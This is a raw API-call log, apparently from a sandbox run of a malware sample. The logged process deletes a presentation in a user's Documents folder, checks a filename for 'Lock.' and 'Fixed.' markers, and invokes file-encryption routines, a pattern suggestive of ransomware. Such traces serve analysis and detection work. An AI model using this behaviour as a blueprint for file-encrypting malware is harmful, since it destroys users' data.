[0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0266.353] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nBWvBa.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx", lpFilePart=0x8cedf4*="nBWvBa.pptx") returned 0x25 [0266.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.353] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nbwvba.pptx")) returned 0x20 [0266.353] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f73ae0, ftCreationTime.dwHighDateTime=0x1d573b2, ftLastAccessTime.dwLowDateTime=0x6a3678a0, ftLastAccessTime.dwHighDateTime=0x1d5e147, ftLastWriteTime.dwLowDateTime=0x6a3678a0, ftLastWriteTime.dwHighDateTime=0x1d5e147, nFileSizeHigh=0x0, nFileSizeLow=0x17c5, dwReserved0=0x1, dwReserved1=0x1c, cFileName="nBWvBa.pptx", cAlternateFileName="NBWVBA~1.PPT")) returned 0xa87050 [0266.353] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nbwvba.pptx")) returned 1 [0266.355] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f73ae0, ftCreationTime.dwHighDateTime=0x1d573b2, ftLastAccessTime.dwLowDateTime=0x6a3678a0, ftLastAccessTime.dwHighDateTime=0x1d5e147, ftLastWriteTime.dwLowDateTime=0x6a3678a0, ftLastWriteTime.dwHighDateTime=0x1d5e147, nFileSizeHigh=0x0, nFileSizeLow=0x17c5, dwReserved0=0x1, dwReserved1=0x1c, cFileName="nBWvBa.pptx", cAlternateFileName="NBWVBA~1.PPT")) returned 0 [0266.355] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.355] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0266.355] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0266.356] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nBWvBa.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx", lpFilePart=0x8cf650*="nBWvBa.pptx") returned 0x25 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.356] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nBWvBa.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nbwvba.pptx")) returned 0xffffffff [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.356] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0266.356] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.356] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0266.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0266.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0266.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nuI2xgrk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uI2xgrk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I2xgrk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2xgrk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xgrk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="grk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rk2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vyv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yv2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0266.358] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0266.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nuI2xgrk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uI2xgrk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I2xgrk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2xgrk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xgrk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="grk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rk2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vyv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yv2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2D.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.359] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0266.359] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0266.359] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.359] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0266.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.361] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/nuI2xgrk2vyv2-2D.pps", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb0cbf0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0xcac8f630, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0xcac8f630, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x13e31, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="nuI2xgrk2vyv2-2D.pps", cAlternateFileName="NUI2XG~1.PPS")) returned 0xa87510 [0266.361] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0266.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.362] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.362] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 